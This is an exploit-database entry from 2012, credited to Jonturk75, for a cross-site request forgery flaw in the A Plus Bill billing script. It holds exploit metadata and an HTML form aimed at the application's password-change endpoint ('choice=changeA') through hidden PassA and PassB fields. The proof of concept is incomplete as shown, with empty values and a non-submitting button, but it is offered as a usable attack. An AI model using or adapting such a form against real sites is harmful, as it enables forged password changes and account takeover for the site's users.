A Plus Bill CSRF Vulnerability



EKU-ID: 1777 CVE: OSVDB-ID:
Author: Jonturk75 Published: 2012-03-27 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: A Plus Bill CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/a-plus-bill/1457/
# Category::  webapps
# Demo : http://www.softwareplusweb.com/billingDemo/
# Greetz: Inj3ct0r Exploit DataBase 1337day.com

<FORM METHOD="post" ACTION="target.com/[PATH]/index.php?choice=changeA" onsubmit="return validateChange(this)" >
<input name="PassA" value="" size="20" maxlength="9" type="hidden">
<input name="PassB" value="" size="20" maxlength="9" type="hidden">
<input value="Change" name="B1" class="button3" type="button">
</form>